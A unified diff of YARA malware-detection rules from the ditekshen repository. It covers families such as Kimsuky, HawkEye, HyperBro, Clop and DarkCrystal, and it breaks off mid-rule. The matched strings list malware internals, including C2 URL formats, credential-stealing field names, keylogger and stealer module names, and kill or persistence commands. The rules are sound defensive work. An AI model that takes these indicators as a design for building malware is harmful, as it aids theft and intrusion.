"ditekSHen" - id = "7533fb83-d721-54e6-8ae1-1c840dd5a13d" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects Kimsuky backdoor" + author = "ditekshen" + id = "6216b874-13f1-5283-9d17-90b7ca6996f8" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4767-L4781" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "da743ca99fd19828e3938875acaf6544f17d884587a59623c8361f5905af4a57" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2707-L2730" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "9f9e64a9cfb3f61bc6b355035c5f0644e4750b740e05cb557c6183c7acfc5a19" score = 75 - quality = 73 + quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.Kimsuky" strings: - $s1 = "Mozilla/4.0 (compatible; )" fullword ascii - $s2 = "/steam/upload.php" ascii - $s3 = ".*?(ssfn\\d+)" fullword ascii - $s4 = "add cookie failed..." fullword ascii - $s5 = "Content-Type: multipart/form-data; boundary=--MULTI-PARTS-FORM-DATA-BOUNDARY" fullword ascii - $pdb1 = "\\SteamHook\\Install\\" ascii - $pdb2 = "\\SteamHook\\dll\\" ascii + $s1 = "Win%d.%d.%dx64" fullword ascii + $s2 = ".zip" fullword ascii + $s3 = ".enc" fullword ascii + $s4 = "&p2=a" fullword ascii + $s5 = "Content-Disposition: form-data; name=\"binary\"; filename=\"" fullword ascii + $s6 = "%s/?m=a&p1=%s&p2=%s-%s-v%d" fullword ascii + $s7 = "/?m=b&p1=" fullword ascii + $s8 = "/?m=c&p1=" fullword ascii + $s9 = "/?m=d&p1=" fullword ascii + $s10 = "http://%s/%s/?m=e&p1=%s&p2=%s&p3=%s" fullword ascii + $s11 = "taskkill.exe /im iexplore.exe /f" fullword ascii + $s12 = "GetParent" fullword ascii + $s13 = "DllRegisterServer" fullword ascii + $dll1 = "AutoUpdate.dll" fullword ascii + $dll2 = "dropper-ie64.dll" fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($s*) or all of ($pdb*) or (1 of ($pdb*) and 3 of ($s*))) + uint16(0)==0x5a4d and ((1 of ($dll*) and 7 of ($s*)) or (11 of ($*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Netwire : FILE +rule DITEKSHEN_MALWARE_Win_Dlagent03 : FILE { meta: - description = "Detects NetWire RAT" + description = "Detects known Delphi downloader agent downloading second stage payload, notably from discord" author = "ditekSHen" - id = "c215f449-c725-51da-8f5b-2619bc282b22" - date = "2024-09-06" - modified = "2024-09-06" + id = "18493e3d-224f-5000-8e44-9ffda9c65cf0" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4783-L4805" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "bae4f0cd7a431336bd784ba95f6ba3396e6f0f12c081e62482ad37ff859c1f1c" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2732-L2753" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "dea63edd48759fd04875e2eb8ac8b00ff801767f071337c667e31c15f0925cdc" score = 75 - quality = 75 + quality = 50 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.DLAgent03" strings: - $x1 = "SOFTWARE\\NetWire" fullword ascii - $x2 = { 4e 65 74 57 69 72 65 00 53 4f 46 54 57 41 52 45 5c 00 } - $s1 = "User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword ascii - $s2 = "filenames.txt" fullword ascii - $s3 = "GET %s HTTP/1.1" fullword ascii - $s4 = "[%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword ascii - $s5 = "Host.exe" fullword ascii - $s6 = "-m \"%s\"" fullword ascii - $g1 = "HostId" fullword ascii - $g2 = "History" fullword ascii - $g3 = "encrypted_key" fullword ascii - $g4 = "Install Date" fullword ascii - $g5 = "hostname" fullword ascii - $g6 = "encryptedUsername" fullword ascii - $g7 = "encryptedPassword" fullword ascii + $delph1 = "FastMM Borland Edition" fullword ascii + $delph2 = "SOFTWARE\\Borland\\Delphi" ascii + $v1_1 = "InternetOpenUrlA" fullword ascii + $v1_2 = "CreateFileA" fullword ascii + $v1_3 = "WriteFile" fullword ascii + $v2_1 = "WinHttp.WinHttpRequest.5.1" fullword ascii + $v2_2 = { 6f 70 65 6e ?? ?? ?? ?? ?? 73 65 6e 64 ?? ?? ?? ?? 72 65 73 70 6f 6e 73 65 74 65 78 74 } + $url1 = "https://discord.com/" fullword ascii + $url2 = "http://www.superutils.com" fullword ascii + $url3 = "http://www.xboxharddrive.com" fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($s*) or all of ($x*) or (1 of ($x*) and 2 of ($s*)) or ( all of ($g*) and (2 of ($s*) or 1 of ($x*)))) + uint16(0)==0x5a4d and 1 of ($delph*) and 1 of ($url*) and ( all of ($v1*) or 1 of ($v2*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Breakstaf : FILE +rule DITEKSHEN_MALWARE_Win_Salfram : FILE { meta: - description = "Detects BreakStaf ransomware" + description = "Detects Salfram executables" author = "ditekSHen" - id = "3c8ca485-2cb4-56fd-a1f5-16b43515cec9" - date = "2024-09-06" - modified = "2024-09-06" + id = "323e1c8e-2184-5831-9af5-a460c55fbf7c" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4807-L4827" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "56078b797c64ce77398f9b92e5677f7159d8357eafb03cf62bb30f06d4f3b2e3" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2755-L2766" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "19d7934727baa870dcd3ec77ba596cd64e49763477ba3feb7baec5ab6d3866d3" score = 75 - quality = 73 + quality = 75 tags = "FILE" + snort2_sid = "920085-920087" + snort3_sid = "920085" + clamav_sig = "MALWARE.Win.Trojan.Salfram" strings: - $s1 = "C:\\Program files" wide - $s2 = "C:\\Program files (x86)" wide - $s3 = "C:\\System Volume Information" wide - $s4 = "C:\\$Recycle.Bin" wide - $s5 = "C:\\Windows" wide - $s6 = ".?AVRandomNumberGenerator@Crypto" ascii - $s7 = ".?AV?$SymmetricCipherFinal@" ascii - $s8 = ".breakstaf" fullword wide nocase - $s9 = "readme.txt" fullword wide nocase - $s10 = ".VHD" fullword wide nocase - $s11 = ".vhdx" fullword wide nocase - $s12 = ".BAK" fullword wide nocase - $s13 = ".BAC" fullword wide nocase + $s1 = "!This Salfram cannot be run in DOS mode." fullword ascii condition: - uint16(0)==0x5a4d and 12 of them + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Kitty : FILE +rule DITEKSHEN_MALWARE_Win_Hawkeyev9 { meta: - description = "Detects HelloKitty ransomware, triggers on FIVEHANDS" - author = "ditekSHen" - id = "4147294a-7eff-595a-ad4f-8a84ffff960f" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects HawkEyeV9 payload" + author = "ditekshen" + id = "ca59aa45-fb55-5f9a-a224-8bd2b72ce5ac" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4829-L4847" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "3a36755c81ec70c127bb73448fc29325444b85b5f0704327fc81975c2af2e99e" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2768-L2793" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d24111930dd0230c01963a90c9fbbc0a0a71df170c2ca116bb329e6158cb681c" score = 75 quality = 75 - tags = "FILE" + tags = "" + clamav_sig = "MALWARE.Win.Trojan.HawkEyeV9" strings: - $s1 = "Kitty" wide - $s2 = "-path" fullword wide - $s3 = "select * from Win32_ShadowCopy" fullword wide - $s4 = "Win32_ShadowCopy.ID='%s'" fullword wide - $s5 = "programdata" fullword wide - $s6 = "$recycle.bin" fullword wide - $s7 = ".crypt" fullword wide - $s8 = "%s/secret/%S" wide - $s9 = "decrypts3nln3tic.onion" wide - $n1 = "read_me_lkd.txt" wide - $n2 = "DECRYPT_NOTE.txt" wide + $id1 = "HawkEye Keylogger - Reborn v9 - {0} Logs - {1} \\ {2}" wide + $id2 = "HawkEye Keylogger - Reborn v9{0}{1} Logs{0}{2} \\ {3}{0}{0}{4}" wide + $str1 = "_PasswordStealer" ascii + $str2 = "_KeyStrokeLogger" ascii + $str3 = "_ScreenshotLogger" ascii + $str4 = "_ClipboardLogger" ascii + $str5 = "_WebCamLogger" ascii + $str6 = "_AntiVirusKiller" ascii + $str7 = "_ProcessElevation" ascii + $str8 = "_DisableCommandPrompt" ascii + $str9 = "_WebsiteBlocker" ascii + $str10 = "_DisableTaskManager" ascii + $str11 = "_AntiDebugger" ascii + $str12 = "_WebsiteVisitorSites" ascii + $str13 = "_DisableRegEdit" ascii + $str14 = "_ExecutionDelay" ascii + $str15 = "_InstallStartupPersistance" ascii condition: - uint16(0)==0x5a4d and (5 of ($s*) or 1 of ($n*) and 4 of ($s*)) + int16 (0)==0x5a4d and (1 of ($id*) or 5 of ($str*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlagent07 : FILE +rule DITEKSHEN_MALWARE_Win_Hyperbro : FILE { meta: - description = "Detects delf downloader agent" + description = "Detects HyperBro (class names) payload" author = "ditekSHen" - id = "a45afe84-15ae-528a-ad7e-ab9f03045789" - date = "2024-09-06" - modified = "2024-09-06" + id = "539b796d-297b-5e2f-84df-282ceaa57bd4" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4849-L4867" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1e0001d18524d0d34ad876e67e2c4dc0495ee18a73c34f53f97367876e27b406" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2795-L2813" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "f6e86ef963de885e0bf92ead075e265618c0745104d223302edd824d409c45cd" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.HyperBro" strings: - $s1 = "C:\\Users\\Public\\Libraries\\temp" fullword ascii - $s2 = "SOFTWARE\\Borland\\Delphi" ascii - $s3 = "Mozilla/5.0(compatible; WinInet)" fullword ascii - $o1 = { f3 a5 e9 6b ff ff ff 5a 5d 5f 5e 5b c3 a3 00 40 } - $o2 = { e8 83 d5 ff ff 8b 15 34 40 41 00 89 10 89 58 04 } - $o3 = { c3 8b c0 53 51 e8 f1 ff ff ff 8b d8 85 db 74 3e } - $o4 = { e8 5c e2 ff ff 8b c3 e8 b9 ff ff ff 89 04 24 83 } - $o5 = { 85 c0 74 1f e8 62 ff ff ff a3 98 40 41 00 e8 98 } - $o6 = { 85 c0 74 19 e8 be ff ff ff 83 3d 98 40 41 00 ff } - $x1 = "22:40:08 \"> <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\"> <rdf:Description rdf:about=\"\"" ascii - $x2 = "uuid:A9BD8E384B2FDE118D26E6EE744C235C\" stRef:documentID=\"uuid:A8BD8E384B2FDE118D26E6EE744C235C\"/>" ascii + $s1 = "VTClipboardInfo" ascii wide + $s2 = "VTClipboardMgr" ascii wide + $s3 = "VTFileRename" ascii wide + $s4 = "VTFileRetime" ascii wide + $s5 = "VTKeyboardInfo" ascii wide + $s6 = "VTKeyboardMgr" ascii wide + $s7 = "VTRegeditKeyInfo" ascii wide + $s8 = "VTRegeditMgr" ascii wide + $s9 = "VTRegeditValueInfo" ascii wide + $s10 = "VTFileDataRes" ascii wide condition: - uint16(0)==0x5a4d and ((2 of ($s*) and 5 of ($o*)) or ( all of ($s*) and 2 of ($o*)) or ( all of ($x*) and 2 of them )) + uint16(0)==0x5a4d and 9 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Clop : FILE +rule DITEKSHEN_MALWARE_Linux_UNK01 : FILE { meta: - description = "Detects Clop ransomware variants" + description = "Detects unknown/unidentified Linux malware" author = "ditekSHen" - id = "d3c9e950-8b03-5d19-8448-9cf208813df2" - date = "2024-09-06" - modified = "2024-09-06" + id = "24c6ff35-9378-5a6b-90d1-9740917b1b72" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4869-L4889" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a1a21100c468c4db147f97b0724b7a3aefbb92b157071bfe6f61d02768573b44" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2815-L2836" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "8bb4822c1c7e0f52726ecafafa696d83c741257587f351360c5295163c245450" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "Cllp^_-" ascii - $s2 = "temp.dat" fullword wide - $s3 = "README_README.txt" wide - $s4 = "BEGIN PUBLIC KEY" ascii - $s5 = "runrun" wide - $s6 = "wevtutil.exe" ascii - $s7 = "%s%s.Cllp" fullword wide - $s8 = "WinCheckDRVs" fullword wide - $o1 = { 6a ff 56 89 9d 28 dd ff ff ff d0 a1 64 32 41 00 } - $o2 = { 56 89 9d 28 dd ff ff ff 15 78 32 41 00 eb 07 43 } - $o3 = { 68 ?? 34 41 00 8d 85 58 dd ff ff 50 ff d7 85 c0 } - $o4 = { 68 d0 34 41 00 50 ff d6 8b bd 28 d5 ff ff 83 c4 } - $o5 = { a1 64 32 41 00 43 56 89 9d 08 d5 ff ff ff d0 8b } + $f1 = "%sresponse.php?status" ascii + $f2 = "%supstream.php?mid=%s&os=%s" ascii fullword + $f3 = "%supstream.php?tid=%" ascii + $f4 = "%sindex.php?token=%.32s&flag=%d&name=%s" ascii fullword + $f5 = "%sactive_off.php?id=%d&uniqu=%d" ascii fullword + $s1 = "lock:%i usable num:%i n:%i" fullword ascii + $s2 = "tid:%.*s tNumber:%i" fullword ascii + $s3 = "init.php" fullword ascii + $s4 = "mod_drone" fullword ascii + $s5 = "new_mid" fullword ascii + $s6 = "&exists[]=" fullword ascii + $s7 = "&mod[]=" fullword ascii + $s8 = "shutdown" fullword ascii + $s9 = "&mac[]=%02X%02X%02X%02X%02X%02X" fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($s*) or (1 of ($x*) and (3 of ($s*) or 4 of ($o*))) or ( all of ($o*) and 2 of ($s*)) or (4 of ($s*) and 4 of ($o*))) + uint16(0)==0x457f and (3 of ($f*) or 6 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Maktub : FILE +rule DITEKSHEN_MALWARE_Linux_UNK02 : FILE { meta: - description = "Detects Maktub ransomware" + description = "Detects unknown/unidentified Linux malware" author = "ditekSHen" - id = "be47d858-8497-593f-865b-c3d3a5db6c2e" - date = "2024-09-06" - modified = "2024-09-06" + id = "6e62df0d-d329-5e52-af74-2a1f19dc4cca" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4891-L4905" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5c11d04fc3088eb8a0132b9ed83748ddb7e1bbe9d03b9e884d4003181cbb6d69" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2838-L2852" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "4cde21932c27fe3c08495f557b5e086b1fb668d8b5508249891828b9ed48edd4" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "Content-Disposition: attachment; filename=" ascii - $s2 = "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" fullword ascii - $s3 = "/tor/status-vote/current/consensus" ascii - $s4 = "/tor/server/fp/" ascii - $s5 = "/tor/rendezvous2/" ascii - $s6 = "404 Not found" fullword ascii - $s7 = /_request@\d+/ fullword ascii + $rf1 = "[]A\\A]A^A_" ascii + $rf2 = "[A\\A]A^A_]" ascii + $f1 = "/bin/basH" ascii fullword + $f2 = "/proc/seH" ascii fullword + $f3 = "/dev/ptsH" ascii fullword + $f4 = "pqrstuvwxyzabcde" ascii fullword + $f5 = "libnss_%s.so.%d.%d" ascii fullword condition: - uint16(0)==0x5a4d and 5 of them + uint16(0)==0x457f and ( all of ($f*) and #rf1>3 and #rf2>3) } import "pe" -rule DITEKSHEN_MALWARE_Win_Pwshloader_Runpe01 +rule DITEKSHEN_MALWARE_Win_Itranslatorexe : FILE { meta: - description = "Detects PowerShell PE loader / executer. Observed Gorgon TTPs" + description = "Detects iTranslator EXE payload" author = "ditekSHen" - id = "fd44f48c-7a24-512b-8375-c9f978a8b5bd" - date = "2024-09-06" - modified = "2024-09-06" + id = "763e8fa4-cf5c-54bc-9310-4e4171bf5a71" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4907-L4920" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "7dd377f6a1cc48ef8ab9d53989755fb967c89d3798b721781bc09043ba3d86f4" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2854-L2874" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "3c796d58cdf2d4dc4c838d05fb862640c7f9de6c7e8ebb5fb0002821354208d9" score = 75 - quality = 75 - tags = "" + quality = 50 + tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.iTranslator_EXE" strings: - $rp1 = "GetType('RunPe.RunPe'" ascii - $rp2 = "GetType(\"RunPe.RunPe\"" ascii - $rm1 = "GetMethod('Run'" ascii - $rm2 = "GetMethod(\"Run\"" ascii - $s1 = ".Invoke(" ascii - $s2 = "[Reflection.Assembly]::Load(" ascii + $s1 = "\\itranslator\\wintrans.exe" fullword wide + $s2 = "\\SuperX\\SuperX\\Obj\\Release\\SharpX.pdb" fullword ascii + $s3 = "\\itranslator\\itranslator.dll" fullword ascii + $s4 = ":Intoskrnl.exe" fullword ascii + $s5 = "InjectDrv.sys" fullword ascii + $s6 = "SharpX.dll" fullword wide + $s7 = "GetMicrosoftEdgeProcessId" ascii + $s8 = ".php?type=is&ch=" ascii + $s9 = ".php?uid=" ascii + $s10 = "&mc=" fullword ascii + $s11 = "&os=" fullword ascii + $s12 = "&x=32" fullword ascii condition: - all of ($s*) and 1 of ($rp*) and 1 of ($rm*) + uint16(0)==0x5a4d and 8 of ($s*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Pwshloader_Runpe02 +rule DITEKSHEN_MALWARE_Win_Itranslatordll : FILE { meta: - description = "Detects PowerShell PE loader / executer. Observed Gorgon TTPs" + description = "Detects iTranslator DLL payload" author = "ditekSHen" - id = "08261054-bebc-58fe-949a-27f6e817003a" - date = "2024-09-06" - modified = "2024-09-06" + id = "df05da78-3626-5eb5-81a2-a93fba844484" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4922-L4934" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d7677689938d3e3eb6b59b99b7e347c60214f6edf8e5f83bf85da5a5f1ad33bb" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2876-L2892" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "ca0479efd241058f358553b6382a1987a5b4c069965f4adb88cd2f3fc4bef21a" score = 75 quality = 75 - tags = "" + tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.iTranslator_DLL" strings: - $s1 = "'.Replace('" ascii nocase - $s2 = "'aspnet_compiler.exe'" ascii - $s3 = "[Byte[]]$" ascii - $pe1 = "(77,90," ascii - $pe2 = "='4D5A" ascii + $d1 = "system32\\drivers\\%S.sys" fullword wide + $d2 = "\\windows\\system32\\winlogon.exe" fullword ascii + $d3 = "\\Registry\\Machine\\SYSTEM\\ControlSet001\\services\\%s" fullword wide + $d4 = "\\Registry\\Machine\\SYSTEM\\ControlSet001\\services\\webssx" fullword wide + $d5 = "\\Device\\CtrlSM" fullword wide + $d6 = "\\DosDevices\\CtrlSM" fullword wide + $d7 = "\\driver_wfp\\CbFlt\\Bin\\CbFlt.pdb" ascii + $d8 = ".php" ascii condition: - all of ($s*) and (#pe1>1 or #pe2>1) and #s1>4 + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Peloader_Runpe : FILE +rule DITEKSHEN_MALWWARE_Win_Octopus : FILE { meta: - description = "Detects PE loader / injector. Observed Gorgon TTPs" + description = "Detects Octopus trojan payload" author = "ditekSHen" - id = "262dedee-05d2-5783-b0ff-24470d310ab8" - date = "2024-09-06" - modified = "2024-09-06" + id = "eb092e23-864f-52f3-bfa4-7e3c616d3984" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4936-L4950" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0369c3e2f83a0265c81e5dcd10b4d88753bd6ce3da4bb893a364486712a2b80d" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2894-L2917" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "012b75c94be3021dbcc5b8e8bd62f807c9aa8bc0df94f830a5294aaf0d21b9fc" score = 75 - quality = 75 + quality = 23 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.Octopus" strings: - $s1 = "commandLine'" fullword ascii - $s2 = "RunPe.dll" fullword ascii - $s3 = "HandleRun" fullword ascii - $s4 = "inheritHandles" fullword ascii - $s5 = "BlockCopy" fullword ascii - $s6 = "WriteProcessMemory" fullword ascii - $s7 = "startupInfo" fullword ascii + $s1 = "\\Mozilla\\Firefox\\Profiles\\" fullword wide + $s2 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword wide + $s3 = "\\wbem\\WMIC.exe" fullword wide + $s4 = ".profiles.ini" fullword wide + $s5 = "PushEBP_" ascii + $s6 = "MovEBP_ESP_" ascii + $s7 = "Embarcadero Delphi for Win32 compiler" ascii + $s8 = "TempWmicBatchFile.bat" fullword wide + $wq1 = "computersystem get Name /format:list" wide + $wq2 = "os get installdate /format:list" wide + $wq3 = "get serialnumber /format:list" wide + $wq4 = "\\\\\\\\.\\\\PHYSICALDRIVE" wide + $wq5 = "path CIM_LogicalDiskBasedOnPartition" wide + $wq6 = "get Antecedent,Dependent" wide + $wq7 = "path win32_physicalmedia" wide condition: - uint16(0)==0x5a4d and 6 of them + uint16(0)==0x5a4d and (6 of ($s*) and 5 of ($wq*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Peloader_INF : FILE +rule DITEKSHEN_MALWARE_Win_Caspertroy : FILE { meta: - description = "Detects PE loader / injector. Potentical HCrypt. Observed Gorgon TTPs" + description = "Detects CasperTroy payload" author = "ditekSHen" - id = "09823302-34e0-5283-9740-1475ab8077be" - date = "2024-09-06" - modified = "2024-09-06" + id = "822c3231-60ba-5e60-8df8-06dea80b318a" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4952-L4963" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "758f7b465b8f9dab5c1194bee266392efe143ac219a5307e6886845b3c862700" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2919-L2931" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "ce070b1e6279ef9fa47f84da7c5166cd93b3e7a0f95541ae14c048b2af9bc431" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "Managament.inf" fullword ascii - $x2 = "rOnAlDo" fullword ascii - $x3 = "untimeResourceSet" fullword ascii - $x4 = "3System.Resources.Tools.StronglyTypedResourceBuilder" fullword ascii + $s1 = "DllTroy.dll" fullword ascii + $s2 = "Content-Disposition: form-data; name=\"image\"; filename=\"title.gif\"" fullword ascii + $s3 = "Content-Disposition: form-data; name=\"COOKIE_ID\"" fullword ascii + $s4 = "Content-Disposition: form-data; name=\"PHP_SESS_ID\"" fullword ascii + $s5 = "Content-Disposition: form-data; name=\"SESS_ID\"" fullword ascii condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and 4 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlagent08 : FILE +rule DITEKSHEN_MALWARE_Win_Rasftuby : FILE { meta: - description = "Detects known downloader agent downloading encoded binaries in patches" + description = "Detects Rasftuby/DarkCrystal" author = "ditekSHen" - id = "e3450f93-7c57-5386-a901-bc5e710657a4" - date = "2024-09-06" - modified = "2024-09-06" + id = "908624a8-0068-5512-a5d0-77ce1f4efd80" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4965-L4975" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0238c13b00e5778ef216b4e8576c321803da6e269c96c3051b9cc45a3ac6e567" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2933-L2950" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b769c1986d23173cf8a8a3c8a14d388a7c0327e46d936fc97c449dc55f2a5575" score = 75 quality = 75 tags = "FILE" - snort2_sid = "920122" - snort3_sid = "920119" + clamav_sig = "MALWARE.Win.Trojan.DarkCrystal.RAT-Rasftuby" strings: - $pat = /\/base\/[A-F0-9]{32}\.html/ ascii wide + $s1 = "/DCRS/main.php?data=active" fullword ascii wide + $s2 = "/socket.php?type=__ds_" ascii wide + $s3 = "/uploader.php" fullword ascii wide + $s4 = "del \\\"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\System.lnk\\\"" fullword ascii wide + $s5 = "Host:{0},Port:{1},User:{2},Pass:{3}<STR>" fullword ascii wide + $s6 = "keyloggerstart_status" fullword ascii wide + $s7 = "keyloggerstop_status" fullword ascii wide + $s8 = "[PRINT SCREEN]" fullword ascii wide + $s9 = "DCS.Internal" ascii condition: - uint16(0)==0x5a4d and $pat and #pat>1 + uint16(0)==0x5a4d and 5 of ($s*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Doejocrypt : FILE +rule DITEKSHEN_MALWARE_Win_Protonbot : FILE { meta: - description = "Detects DoejoCrypt / DearCry ransomware" + description = "Detects ProtonBot 